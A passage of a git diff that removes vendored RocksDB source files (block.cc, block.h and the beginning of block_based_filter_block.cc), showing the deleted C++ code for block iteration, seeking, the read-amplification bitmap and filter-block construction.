-// "*value_length", respectively.  Will not derefence past "limit".
-//
-// If any errors are detected, returns nullptr.  Otherwise, returns a
-// pointer to the key delta (just past the three decoded values).
-static inline const char* DecodeEntry(const char* p, const char* limit,
-                                      uint32_t* shared,
-                                      uint32_t* non_shared,
-                                      uint32_t* value_length) {
-  if (limit - p < 3) return nullptr;
-  *shared = reinterpret_cast<const unsigned char*>(p)[0];
-  *non_shared = reinterpret_cast<const unsigned char*>(p)[1];
-  *value_length = reinterpret_cast<const unsigned char*>(p)[2];
-  if ((*shared | *non_shared | *value_length) < 128) {
-    // Fast path: all three values are encoded in one byte each
-    p += 3;
-  } else {
-    if ((p = GetVarint32Ptr(p, limit, shared)) == nullptr) return nullptr;
-    if ((p = GetVarint32Ptr(p, limit, non_shared)) == nullptr) return nullptr;
-    if ((p = GetVarint32Ptr(p, limit, value_length)) == nullptr) return nullptr;
-  }
-
-  if (static_cast<uint32_t>(limit - p) < (*non_shared + *value_length)) {
-    return nullptr;
-  }
-  return p;
-}
-
-void BlockIter::Next() {
-  assert(Valid());
-  ParseNextKey();
-}
-
-void BlockIter::Prev() {
-  assert(Valid());
-
-  assert(prev_entries_idx_ == -1 ||
-         static_cast<size_t>(prev_entries_idx_) < prev_entries_.size());
-  // Check if we can use cached prev_entries_
-  if (prev_entries_idx_ > 0 &&
-      prev_entries_[prev_entries_idx_].offset == current_) {
-    // Read cached CachedPrevEntry
-    prev_entries_idx_--;
-    const CachedPrevEntry& current_prev_entry =
-        prev_entries_[prev_entries_idx_];
-
-    const char* key_ptr = nullptr;
-    if (current_prev_entry.key_ptr != nullptr) {
-      // The key is not delta encoded and stored in the data block
-      key_ptr = current_prev_entry.key_ptr;
-      key_pinned_ = true;
-    } else {
-      // The key is delta encoded and stored in prev_entries_keys_buff_
-      key_ptr = prev_entries_keys_buff_.data() + current_prev_entry.key_offset;
-      key_pinned_ = false;
-    }
-    const Slice current_key(key_ptr, current_prev_entry.key_size);
-
-    current_ = current_prev_entry.offset;
-    key_.SetInternalKey(current_key, false /* copy */);
-    value_ = current_prev_entry.value;
-
-    return;
-  }
-
-  // Clear prev entries cache
-  prev_entries_idx_ = -1;
-  prev_entries_.clear();
-  prev_entries_keys_buff_.clear();
-
-  // Scan backwards to a restart point before current_
-  const uint32_t original = current_;
-  while (GetRestartPoint(restart_index_) >= original) {
-    if (restart_index_ == 0) {
-      // No more entries
-      current_ = restarts_;
-      restart_index_ = num_restarts_;
-      return;
-    }
-    restart_index_--;
-  }
-
-  SeekToRestartPoint(restart_index_);
-
-  do {
-    if (!ParseNextKey()) {
-      break;
-    }
-    Slice current_key = key();
-
-    if (key_.IsKeyPinned()) {
-      // The key is not delta encoded
-      prev_entries_.emplace_back(current_, current_key.data(), 0,
-                                 current_key.size(), value());
-    } else {
-      // The key is delta encoded, cache decoded key in buffer
-      size_t new_key_offset = prev_entries_keys_buff_.size();
-      prev_entries_keys_buff_.append(current_key.data(), current_key.size());
-
-      prev_entries_.emplace_back(current_, nullptr, new_key_offset,
-                                 current_key.size(), value());
-    }
-    // Loop until end of current entry hits the start of original entry
-  } while (NextEntryOffset() < original);
-  prev_entries_idx_ = static_cast<int32_t>(prev_entries_.size()) - 1;
-}
-
-void BlockIter::Seek(const Slice& target) {
-  PERF_TIMER_GUARD(block_seek_nanos);
-  if (data_ == nullptr) {  // Not init yet
-    return;
-  }
-  uint32_t index = 0;
-  bool ok = false;
-  if (prefix_index_) {
-    ok = PrefixSeek(target, &index);
-  } else {
-    ok = BinarySeek(target, 0, num_restarts_ - 1, &index);
-  }
-
-  if (!ok) {
-    return;
-  }
-  SeekToRestartPoint(index);
-  // Linear search (within restart block) for first key >= target
-
-  while (true) {
-    if (!ParseNextKey() || Compare(key_.GetInternalKey(), target) >= 0) {
-      return;
-    }
-  }
-}
-
-void BlockIter::SeekForPrev(const Slice& target) {
-  PERF_TIMER_GUARD(block_seek_nanos);
-  if (data_ == nullptr) {  // Not init yet
-    return;
-  }
-  uint32_t index = 0;
-  bool ok = false;
-  ok = BinarySeek(target, 0, num_restarts_ - 1, &index);
-
-  if (!ok) {
-    return;
-  }
-  SeekToRestartPoint(index);
-  // Linear search (within restart block) for first key >= target
-
-  while (ParseNextKey() && Compare(key_.GetInternalKey(), target) < 0) {
-  }
-  if (!Valid()) {
-    SeekToLast();
-  } else {
-    while (Valid() && Compare(key_.GetInternalKey(), target) > 0) {
-      Prev();
-    }
-  }
-}
-
-void BlockIter::SeekToFirst() {
-  if (data_ == nullptr) {  // Not init yet
-    return;
-  }
-  SeekToRestartPoint(0);
-  ParseNextKey();
-}
-
-void BlockIter::SeekToLast() {
-  if (data_ == nullptr) {  // Not init yet
-    return;
-  }
-  SeekToRestartPoint(num_restarts_ - 1);
-  while (ParseNextKey() && NextEntryOffset() < restarts_) {
-    // Keep skipping
-  }
-}
-
-void BlockIter::CorruptionError() {
-  current_ = restarts_;
-  restart_index_ = num_restarts_;
-  status_ = Status::Corruption("bad entry in block");
-  key_.Clear();
-  value_.clear();
-}
-
-bool BlockIter::ParseNextKey() {
-  current_ = NextEntryOffset();
-  const char* p = data_ + current_;
-  const char* limit = data_ + restarts_;  // Restarts come right after data
-  if (p >= limit) {
-    // No more entries to return.  Mark as invalid.
-    current_ = restarts_;
-    restart_index_ = num_restarts_;
-    return false;
-  }
-
-  // Decode next entry
-  uint32_t shared, non_shared, value_length;
-  p = DecodeEntry(p, limit, &shared, &non_shared, &value_length);
-  if (p == nullptr || key_.Size() < shared) {
-    CorruptionError();
-    return false;
-  } else {
-    if (shared == 0) {
-      // If this key dont share any bytes with prev key then we dont need
-      // to decode it and can use it's address in the block directly.
-      key_.SetInternalKey(Slice(p, non_shared), false /* copy */);
-      key_pinned_ = true;
-    } else {
-      // This key share `shared` bytes with prev key, we need to decode it
-      key_.TrimAppend(shared, p, non_shared);
-      key_pinned_ = false;
-    }
-
-    if (global_seqno_ != kDisableGlobalSequenceNumber) {
-      // If we are reading a file with a global sequence number we should
-      // expect that all encoded sequence numbers are zeros and any value
-      // type is kTypeValue, kTypeMerge or kTypeDeletion
-      assert(GetInternalKeySeqno(key_.GetInternalKey()) == 0);
-
-      ValueType value_type = ExtractValueType(key_.GetInternalKey());
-      assert(value_type == ValueType::kTypeValue ||
-             value_type == ValueType::kTypeMerge ||
-             value_type == ValueType::kTypeDeletion);
-
-      if (key_pinned_) {
-        // TODO(tec): Investigate updating the seqno in the loaded block
-        // directly instead of doing a copy and update.
-
-        // We cannot use the key address in the block directly because
-        // we have a global_seqno_ that will overwrite the encoded one.
-        key_.OwnKey();
-        key_pinned_ = false;
-      }
-
-      key_.UpdateInternalKey(global_seqno_, value_type);
-    }
-
-    value_ = Slice(p + non_shared, value_length);
-    while (restart_index_ + 1 < num_restarts_ &&
-           GetRestartPoint(restart_index_ + 1) < current_) {
-      ++restart_index_;
-    }
-    return true;
-  }
-}
-
-// Binary search in restart array to find the first restart point that
-// is either the last restart point with a key less than target,
-// which means the key of next restart point is larger than target, or
-// the first restart point with a key = target
-bool BlockIter::BinarySeek(const Slice& target, uint32_t left, uint32_t right,
-                           uint32_t* index) {
-  assert(left <= right);
-
-  while (left < right) {
-    uint32_t mid = (left + right + 1) / 2;
-    uint32_t region_offset = GetRestartPoint(mid);
-    uint32_t shared, non_shared, value_length;
-    const char* key_ptr = DecodeEntry(data_ + region_offset, data_ + restarts_,
-                                      &shared, &non_shared, &value_length);
-    if (key_ptr == nullptr || (shared != 0)) {
-      CorruptionError();
-      return false;
-    }
-    Slice mid_key(key_ptr, non_shared);
-    int cmp = Compare(mid_key, target);
-    if (cmp < 0) {
-      // Key at "mid" is smaller than "target". Therefore all
-      // blocks before "mid" are uninteresting.
-      left = mid;
-    } else if (cmp > 0) {
-      // Key at "mid" is >= "target". Therefore all blocks at or
-      // after "mid" are uninteresting.
-      right = mid - 1;
-    } else {
-      left = right = mid;
-    }
-  }
-
-  *index = left;
-  return true;
-}
-
-// Compare target key and the block key of the block of `block_index`.
-// Return -1 if error.
-int BlockIter::CompareBlockKey(uint32_t block_index, const Slice& target) {
-  uint32_t region_offset = GetRestartPoint(block_index);
-  uint32_t shared, non_shared, value_length;
-  const char* key_ptr = DecodeEntry(data_ + region_offset, data_ + restarts_,
-                                    &shared, &non_shared, &value_length);
-  if (key_ptr == nullptr || (shared != 0)) {
-    CorruptionError();
-    return 1;  // Return target is smaller
-  }
-  Slice block_key(key_ptr, non_shared);
-  return Compare(block_key, target);
-}
-
-// Binary search in block_ids to find the first block
-// with a key >= target
-bool BlockIter::BinaryBlockIndexSeek(const Slice& target, uint32_t* block_ids,
-                                     uint32_t left, uint32_t right,
-                                     uint32_t* index) {
-  assert(left <= right);
-  uint32_t left_bound = left;
-
-  while (left <= right) {
-    uint32_t mid = (right + left) / 2;
-
-    int cmp = CompareBlockKey(block_ids[mid], target);
-    if (!status_.ok()) {
-      return false;
-    }
-    if (cmp < 0) {
-      // Key at "target" is larger than "mid". Therefore all
-      // blocks before or at "mid" are uninteresting.
-      left = mid + 1;
-    } else {
-      // Key at "target" is <= "mid". Therefore all blocks
-      // after "mid" are uninteresting.
-      // If there is only one block left, we found it.
-      if (left == right) break;
-      right = mid;
-    }
-  }
-
-  if (left == right) {
-    // In one of the two following cases:
-    // (1) left is the first one of block_ids
-    // (2) there is a gap of blocks between block of `left` and `left-1`.
-    // we can further distinguish the case of key in the block or key not
-    // existing, by comparing the target key and the key of the previous
-    // block to the left of the block found.
-    if (block_ids[left] > 0 &&
-        (left == left_bound || block_ids[left - 1] != block_ids[left] - 1) &&
-        CompareBlockKey(block_ids[left] - 1, target) > 0) {
-      current_ = restarts_;
-      return false;
-    }
-
-    *index = block_ids[left];
-    return true;
-  } else {
-    assert(left > right);
-    // Mark iterator invalid
-    current_ = restarts_;
-    return false;
-  }
-}
-
-bool BlockIter::PrefixSeek(const Slice& target, uint32_t* index) {
-  assert(prefix_index_);
-  uint32_t* block_ids = nullptr;
-  uint32_t num_blocks = prefix_index_->GetBlocks(target, &block_ids);
-
-  if (num_blocks == 0) {
-    current_ = restarts_;
-    return false;
-  } else  {
-    return BinaryBlockIndexSeek(target, block_ids, 0, num_blocks - 1, index);
-  }
-}
-
-uint32_t Block::NumRestarts() const {
-  assert(size_ >= 2*sizeof(uint32_t));
-  return DecodeFixed32(data_ + size_ - sizeof(uint32_t));
-}
-
-Block::Block(BlockContents&& contents, SequenceNumber _global_seqno,
-             size_t read_amp_bytes_per_bit, Statistics* statistics)
-    : contents_(std::move(contents)),
-      data_(contents_.data.data()),
-      size_(contents_.data.size()),
-      global_seqno_(_global_seqno) {
-  if (size_ < sizeof(uint32_t)) {
-    size_ = 0;  // Error marker
-  } else {
-    restart_offset_ =
-        static_cast<uint32_t>(size_) - (1 + NumRestarts()) * sizeof(uint32_t);
-    if (restart_offset_ > size_ - sizeof(uint32_t)) {
-      // The size is too small for NumRestarts() and therefore
-      // restart_offset_ wrapped around.
-      size_ = 0;
-    }
-  }
-  if (read_amp_bytes_per_bit != 0 && statistics && size_ != 0) {
-    read_amp_bitmap_.reset(new BlockReadAmpBitmap(
-        restart_offset_, read_amp_bytes_per_bit, statistics));
-  }
-}
-
-InternalIterator* Block::NewIterator(const Comparator* cmp, BlockIter* iter,
-                                     bool total_order_seek, Statistics* stats) {
-  if (size_ < 2*sizeof(uint32_t)) {
-    if (iter != nullptr) {
-      iter->SetStatus(Status::Corruption("bad block contents"));
-      return iter;
-    } else {
-      return NewErrorInternalIterator(Status::Corruption("bad block contents"));
-    }
-  }
-  const uint32_t num_restarts = NumRestarts();
-  if (num_restarts == 0) {
-    if (iter != nullptr) {
-      iter->SetStatus(Status::OK());
-      return iter;
-    } else {
-      return NewEmptyInternalIterator();
-    }
-  } else {
-    BlockPrefixIndex* prefix_index_ptr =
-        total_order_seek ? nullptr : prefix_index_.get();
-
-    if (iter != nullptr) {
-      iter->Initialize(cmp, data_, restart_offset_, num_restarts,
-                       prefix_index_ptr, global_seqno_, read_amp_bitmap_.get());
-    } else {
-      iter = new BlockIter(cmp, data_, restart_offset_, num_restarts,
-                           prefix_index_ptr, global_seqno_,
-                           read_amp_bitmap_.get());
-    }
-
-    if (read_amp_bitmap_) {
-      if (read_amp_bitmap_->GetStatistics() != stats) {
-        // DB changed the Statistics pointer, we need to notify read_amp_bitmap_
-        read_amp_bitmap_->SetStatistics(stats);
-      }
-    }
-  }
-
-  return iter;
-}
-
-void Block::SetBlockPrefixIndex(BlockPrefixIndex* prefix_index) {
-  prefix_index_.reset(prefix_index);
-}
-
-size_t Block::ApproximateMemoryUsage() const {
-  size_t usage = usable_size();
-  if (prefix_index_) {
-    usage += prefix_index_->ApproximateMemoryUsage();
-  }
-  return usage;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block.h b/thirdparty/rocksdb/table/block.h
deleted file mode 100644
index 59dc167..0000000
--- a/thirdparty/rocksdb/table/block.h
+++ /dev/null
@@ -1,384 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-#include <vector>
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-#ifdef OS_FREEBSD
-#include <malloc_np.h>
-#else
-#include <malloc.h>
-#endif
-#endif
-
-#include "db/dbformat.h"
-#include "db/pinned_iterators_manager.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "table/block_prefix_index.h"
-#include "table/internal_iterator.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "format.h"
-
-namespace rocksdb {
-
-struct BlockContents;
-class Comparator;
-class BlockIter;
-class BlockPrefixIndex;
-
-// BlockReadAmpBitmap is a bitmap that map the rocksdb::Block data bytes to
-// a bitmap with ratio bytes_per_bit. Whenever we access a range of bytes in
-// the Block we update the bitmap and increment READ_AMP_ESTIMATE_USEFUL_BYTES.
-class BlockReadAmpBitmap {
- public:
-  explicit BlockReadAmpBitmap(size_t block_size, size_t bytes_per_bit,
-                              Statistics* statistics)
-      : bitmap_(nullptr),
-        bytes_per_bit_pow_(0),
-        statistics_(statistics),
-        rnd_(
-            Random::GetTLSInstance()->Uniform(static_cast<int>(bytes_per_bit))) {
-    TEST_SYNC_POINT_CALLBACK("BlockReadAmpBitmap:rnd", &rnd_);
-    assert(block_size > 0 && bytes_per_bit > 0);
-
-    // convert bytes_per_bit to be a power of 2
-    while (bytes_per_bit >>= 1) {
-      bytes_per_bit_pow_++;
-    }
-
-    // num_bits_needed = ceil(block_size / bytes_per_bit)
-    size_t num_bits_needed =
-      ((block_size - 1) >> bytes_per_bit_pow_) + 1;
-    assert(num_bits_needed > 0);
-
-    // bitmap_size = ceil(num_bits_needed / kBitsPerEntry)
-    size_t bitmap_size = (num_bits_needed - 1) / kBitsPerEntry + 1;
-
-    // Create bitmap and set all the bits to 0
-    bitmap_ = new std::atomic<uint32_t>[bitmap_size]();
-
-    RecordTick(GetStatistics(), READ_AMP_TOTAL_READ_BYTES, block_size);
-  }
-
-  ~BlockReadAmpBitmap() { delete[] bitmap_; }
-
-  void Mark(uint32_t start_offset, uint32_t end_offset) {
-    assert(end_offset >= start_offset);
-    // Index of first bit in mask
-    uint32_t start_bit =
-        (start_offset + (1 << bytes_per_bit_pow_) - rnd_ - 1) >>
-        bytes_per_bit_pow_;
-    // Index of last bit in mask + 1
-    uint32_t exclusive_end_bit =
-        (end_offset + (1 << bytes_per_bit_pow_) - rnd_) >> bytes_per_bit_pow_;
-    if (start_bit >= exclusive_end_bit) {
-      return;
-    }
-    assert(exclusive_end_bit > 0);
-
-    if (GetAndSet(start_bit) == 0) {
-      uint32_t new_useful_bytes = (exclusive_end_bit - start_bit)
-                                  << bytes_per_bit_pow_;
-      RecordTick(GetStatistics(), READ_AMP_ESTIMATE_USEFUL_BYTES,
-                 new_useful_bytes);
-    }
-  }
-
-  Statistics* GetStatistics() {
-    return statistics_.load(std::memory_order_relaxed);
-  }
-
-  void SetStatistics(Statistics* stats) { statistics_.store(stats); }
-
-  uint32_t GetBytesPerBit() { return 1 << bytes_per_bit_pow_; }
-
- private:
-  // Get the current value of bit at `bit_idx` and set it to 1
-  inline bool GetAndSet(uint32_t bit_idx) {
-    const uint32_t byte_idx = bit_idx / kBitsPerEntry;
-    const uint32_t bit_mask = 1 << (bit_idx % kBitsPerEntry);
-
-    return bitmap_[byte_idx].fetch_or(bit_mask, std::memory_order_relaxed) &
-           bit_mask;
-  }
-
-  const uint32_t kBytesPersEntry = sizeof(uint32_t);   // 4 bytes
-  const uint32_t kBitsPerEntry = kBytesPersEntry * 8;  // 32 bits
-
-  // Bitmap used to record the bytes that we read, use atomic to protect
-  // against multiple threads updating the same bit
-  std::atomic<uint32_t>* bitmap_;
-  // (1 << bytes_per_bit_pow_) is bytes_per_bit. Use power of 2 to optimize
-  // muliplication and division
-  uint8_t bytes_per_bit_pow_;
-  // Pointer to DB Statistics object, Since this bitmap may outlive the DB
-  // this pointer maybe invalid, but the DB will update it to a valid pointer
-  // by using SetStatistics() before calling Mark()
-  std::atomic<Statistics*> statistics_;
-  uint32_t rnd_;
-};
-
-class Block {
- public:
-  // Initialize the block with the specified contents.
-  explicit Block(BlockContents&& contents, SequenceNumber _global_seqno,
-                 size_t read_amp_bytes_per_bit = 0,
-                 Statistics* statistics = nullptr);
-
-  ~Block() = default;
-
-  size_t size() const { return size_; }
-  const char* data() const { return data_; }
-  bool cachable() const { return contents_.cachable; }
-  size_t usable_size() const {
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-    if (contents_.allocation.get() != nullptr) {
-      return malloc_usable_size(contents_.allocation.get());
-    }
-#endif  // ROCKSDB_MALLOC_USABLE_SIZE
-    return size_;
-  }
-  uint32_t NumRestarts() const;
-  CompressionType compression_type() const {
-    return contents_.compression_type;
-  }
-
-  // If hash index lookup is enabled and `use_hash_index` is true. This block
-  // will do hash lookup for the key prefix.
-  //
-  // NOTE: for the hash based lookup, if a key prefix doesn't match any key,
-  // the iterator will simply be set as "invalid", rather than returning
-  // the key that is just pass the target key.
-  //
-  // If iter is null, return new Iterator
-  // If iter is not null, update this one and return it as Iterator*
-  //
-  // If total_order_seek is true, hash_index_ and prefix_index_ are ignored.
-  // This option only applies for index block. For data block, hash_index_
-  // and prefix_index_ are null, so this option does not matter.
-  InternalIterator* NewIterator(const Comparator* comparator,
-                                BlockIter* iter = nullptr,
-                                bool total_order_seek = true,
-                                Statistics* stats = nullptr);
-  void SetBlockPrefixIndex(BlockPrefixIndex* prefix_index);
-
-  // Report an approximation of how much memory has been used.
-  size_t ApproximateMemoryUsage() const;
-
-  SequenceNumber global_seqno() const { return global_seqno_; }
-
- private:
-  BlockContents contents_;
-  const char* data_;            // contents_.data.data()
-  size_t size_;                 // contents_.data.size()
-  uint32_t restart_offset_;     // Offset in data_ of restart array
-  std::unique_ptr<BlockPrefixIndex> prefix_index_;
-  std::unique_ptr<BlockReadAmpBitmap> read_amp_bitmap_;
-  // All keys in the block will have seqno = global_seqno_, regardless of
-  // the encoded value (kDisableGlobalSequenceNumber means disabled)
-  const SequenceNumber global_seqno_;
-
-  // No copying allowed
-  Block(const Block&);
-  void operator=(const Block&);
-};
-
-class BlockIter : public InternalIterator {
- public:
-  BlockIter()
-      : comparator_(nullptr),
-        data_(nullptr),
-        restarts_(0),
-        num_restarts_(0),
-        current_(0),
-        restart_index_(0),
-        status_(Status::OK()),
-        prefix_index_(nullptr),
-        key_pinned_(false),
-        global_seqno_(kDisableGlobalSequenceNumber),
-        read_amp_bitmap_(nullptr),
-        last_bitmap_offset_(0) {}
-
-  BlockIter(const Comparator* comparator, const char* data, uint32_t restarts,
-            uint32_t num_restarts, BlockPrefixIndex* prefix_index,
-            SequenceNumber global_seqno, BlockReadAmpBitmap* read_amp_bitmap)
-      : BlockIter() {
-    Initialize(comparator, data, restarts, num_restarts, prefix_index,
-               global_seqno, read_amp_bitmap);
-  }
-
-  void Initialize(const Comparator* comparator, const char* data,
-                  uint32_t restarts, uint32_t num_restarts,
-                  BlockPrefixIndex* prefix_index, SequenceNumber global_seqno,
-                  BlockReadAmpBitmap* read_amp_bitmap) {
-    assert(data_ == nullptr);           // Ensure it is called only once
-    assert(num_restarts > 0);           // Ensure the param is valid
-
-    comparator_ = comparator;
-    data_ = data;
-    restarts_ = restarts;
-    num_restarts_ = num_restarts;
-    current_ = restarts_;
-    restart_index_ = num_restarts_;
-    prefix_index_ = prefix_index;
-    global_seqno_ = global_seqno;
-    read_amp_bitmap_ = read_amp_bitmap;
-    last_bitmap_offset_ = current_ + 1;
-  }
-
-  void SetStatus(Status s) {
-    status_ = s;
-  }
-
-  virtual bool Valid() const override { return current_ < restarts_; }
-  virtual Status status() const override { return status_; }
-  virtual Slice key() const override {
-    assert(Valid());
-    return key_.GetInternalKey();
-  }
-  virtual Slice value() const override {
-    assert(Valid());
-    if (read_amp_bitmap_ && current_ < restarts_ &&
-        current_ != last_bitmap_offset_) {
-      read_amp_bitmap_->Mark(current_ /* current entry offset */,
-                             NextEntryOffset() - 1);
-      last_bitmap_offset_ = current_;
-    }
-    return value_;
-  }
-
-  virtual void Next() override;
-
-  virtual void Prev() override;
-
-  virtual void Seek(const Slice& target) override;
-
-  virtual void SeekForPrev(const Slice& target) override;
-
-  virtual void SeekToFirst() override;
-
-  virtual void SeekToLast() override;
-
-#ifndef NDEBUG
-  ~BlockIter() {
-    // Assert that the BlockIter is never deleted while Pinning is Enabled.
-    assert(!pinned_iters_mgr_ ||
-           (pinned_iters_mgr_ && !pinned_iters_mgr_->PinningEnabled()));
-  }
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-  }
-  PinnedIteratorsManager* pinned_iters_mgr_ = nullptr;
-#endif
-
-  virtual bool IsKeyPinned() const override { return key_pinned_; }
-
-  virtual bool IsValuePinned() const override { return true; }
-
-  size_t TEST_CurrentEntrySize() { return NextEntryOffset() - current_; }
-
-  uint32_t ValueOffset() const {
-    return static_cast<uint32_t>(value_.data() - data_);
-  }
-
- private:
-  const Comparator* comparator_;
-  const char* data_;       // underlying block contents
-  uint32_t restarts_;      // Offset of restart array (list of fixed32)
-  uint32_t num_restarts_;  // Number of uint32_t entries in restart array
-
-  // current_ is offset in data_ of current entry.  >= restarts_ if !Valid
-  uint32_t current_;
-  uint32_t restart_index_;  // Index of restart block in which current_ falls
-  IterKey key_;
-  Slice value_;
-  Status status_;
-  BlockPrefixIndex* prefix_index_;
-  bool key_pinned_;
-  SequenceNumber global_seqno_;
-
-  // read-amp bitmap
-  BlockReadAmpBitmap* read_amp_bitmap_;
-  // last `current_` value we report to read-amp bitmp
-  mutable uint32_t last_bitmap_offset_;
-
-  struct CachedPrevEntry {
-    explicit CachedPrevEntry(uint32_t _offset, const char* _key_ptr,
-                             size_t _key_offset, size_t _key_size, Slice _value)
-        : offset(_offset),
-          key_ptr(_key_ptr),
-          key_offset(_key_offset),
-          key_size(_key_size),
-          value(_value) {}
-
-    // offset of entry in block
-    uint32_t offset;
-    // Pointer to key data in block (nullptr if key is delta-encoded)
-    const char* key_ptr;
-    // offset of key in prev_entries_keys_buff_ (0 if key_ptr is not nullptr)
-    size_t key_offset;
-    // size of key
-    size_t key_size;
-    // value slice pointing to data in block
-    Slice value;
-  };
-  std::string prev_entries_keys_buff_;
-  std::vector<CachedPrevEntry> prev_entries_;
-  int32_t prev_entries_idx_ = -1;
-
-  inline int Compare(const Slice& a, const Slice& b) const {
-    return comparator_->Compare(a, b);
-  }
-
-  // Return the offset in data_ just past the end of the current entry.
-  inline uint32_t NextEntryOffset() const {
-    // NOTE: We don't support blocks bigger than 2GB
-    return static_cast<uint32_t>((value_.data() + value_.size()) - data_);
-  }
-
-  uint32_t GetRestartPoint(uint32_t index) {
-    assert(index < num_restarts_);
-    return DecodeFixed32(data_ + restarts_ + index * sizeof(uint32_t));
-  }
-
-  void SeekToRestartPoint(uint32_t index) {
-    key_.Clear();
-    restart_index_ = index;
-    // current_ will be fixed by ParseNextKey();
-
-    // ParseNextKey() starts at the end of value_, so set value_ accordingly
-    uint32_t offset = GetRestartPoint(index);
-    value_ = Slice(data_ + offset, 0);
-  }
-
-  void CorruptionError();
-
-  bool ParseNextKey();
-
-  bool BinarySeek(const Slice& target, uint32_t left, uint32_t right,
-                  uint32_t* index);
-
-  int CompareBlockKey(uint32_t block_index, const Slice& target);
-
-  bool BinaryBlockIndexSeek(const Slice& target, uint32_t* block_ids,
-                            uint32_t left, uint32_t right,
-                            uint32_t* index);
-
-  bool PrefixSeek(const Slice& target, uint32_t* index);
-
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_filter_block.cc b/thirdparty/rocksdb/table/block_based_filter_block.cc
deleted file mode 100644
index 697c11a..0000000
--- a/thirdparty/rocksdb/table/block_based_filter_block.cc
+++ /dev/null
@@ -1,255 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/block_based_filter_block.h"
-#include <algorithm>
-
-#include "db/dbformat.h"
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/filter_policy.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-namespace {
-
-void AppendItem(std::string* props, const std::string& key,
-                const std::string& value) {
-  char cspace = ' ';
-  std::string value_str("");
-  size_t i = 0;
-  const size_t dataLength = 64;
-  const size_t tabLength = 2;
-  const size_t offLength = 16;
-
-  value_str.append(&value[i], std::min(size_t(dataLength), value.size()));
-  i += dataLength;
-  while (i < value.size()) {
-    value_str.append("\n");
-    value_str.append(offLength, cspace);
-    value_str.append(&value[i], std::min(size_t(dataLength), value.size() - i));
-    i += dataLength;
-  }
-
-  std::string result("");
-  if (key.size() < (offLength - tabLength))
-    result.append(size_t((offLength - tabLength)) - key.size(), cspace);
-  result.append(key);
-
-  props->append(result + ": " + value_str + "\n");
-}
-
-template <class TKey>
-void AppendItem(std::string* props, const TKey& key, const std::string& value) {
-  std::string key_str = rocksdb::ToString(key);
-  AppendItem(props, key_str, value);
-}
-}  // namespace
-
-
-// See doc/table_format.txt for an explanation of the filter block format.
-
-// Generate new filter every 2KB of data
-static const size_t kFilterBaseLg = 11;
-static const size_t kFilterBase = 1 << kFilterBaseLg;
-
-BlockBasedFilterBlockBuilder::BlockBasedFilterBlockBuilder(
-    const SliceTransform* prefix_extractor,
-    const BlockBasedTableOptions& table_opt)
-    : policy_(table_opt.filter_policy.get()),
-      prefix_extractor_(prefix_extractor),
-      whole_key_filtering_(table_opt.whole_key_filtering),
-      prev_prefix_start_(0),
-      prev_prefix_size_(0) {
-  assert(policy_);
-}
-
-void BlockBasedFilterBlockBuilder::StartBlock(uint64_t block_offset) {
-  uint64_t filter_index = (block_offset / kFilterBase);
-  assert(filter_index >= filter_offsets_.size());
-  while (filter_index > filter_offsets_.size()) {
-    GenerateFilter();
-  }
-}
-
-void BlockBasedFilterBlockBuilder::Add(const Slice& key) {
-  if (prefix_extractor_ && prefix_extractor_->InDomain(key)) {
-    AddPrefix(key);
-  }
-
-  if (whole_key_filtering_) {
-    AddKey(key);
-  }
-}
-
-// Add key to filter if needed
-inline void BlockBasedFilterBlockBuilder::AddKey(const Slice& key) {
-  start_.push_back(entries_.size());
-  entries_.append(key.data(), key.size());
-}
-
-// Add prefix to filter if needed
-inline void BlockBasedFilterBlockBuilder::AddPrefix(const Slice& key) {
-  // get slice for most recently added entry
-  Slice prev;
-  if (prev_prefix_size_ > 0) {
-    prev = Slice(entries_.data() + prev_prefix_start_, prev_prefix_size_);
-  }
-
-  Slice prefix = prefix_extractor_->Transform(key);
-  // insert prefix only when it's different from the previous prefix.
-  if (prev.size() == 0 || prefix != prev) {
-    start_.push_back(entries_.size());
-    prev_prefix_start_ = entries_.size();
-    prev_prefix_size_ = prefix.size();
-    entries_.append(prefix.data(), prefix.size());
-  }
-}
-
-Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& tmp,
-                                           Status* status) {
-  // In this impl we ignore BlockHandle
-  *status = Status::OK();
-  if (!start_.empty()) {
-    GenerateFilter();
-  }
-
-  // Append array of per-filter offsets
-  const uint32_t array_offset = static_cast<uint32_t>(result_.size());
-  for (size_t i = 0; i < filter_offsets_.size(); i++) {
-    PutFixed32(&result_, filter_offsets_[i]);
-  }
-
-  PutFixed32(&result_, array_offset);
-  result_.push_back(kFilterBaseLg);  // Save encoding parameter in result
-  return Slice(result_);
-}
-
-void BlockBasedFilterBlockBuilder::GenerateFilter() {
-  const size_t num_entries = start_.size();
-  if (num_entries == 0) {
-    // Fast path if there are no keys for this filter
-    filter_offsets_.push_back(static_cast<uint32_t>(result_.size()));
-    return;
-  }
-
-  // Make list of keys from flattened key structure
-  start_.push_back(entries_.size());  // Simplify length computation
-  tmp_entries_.resize(num_entries);
-  for (size_t i = 0; i < num_entries; i++) {
-    const char* base = entries_.data() + start_[i];
-    size_t length = start_[i + 1] - start_[i];
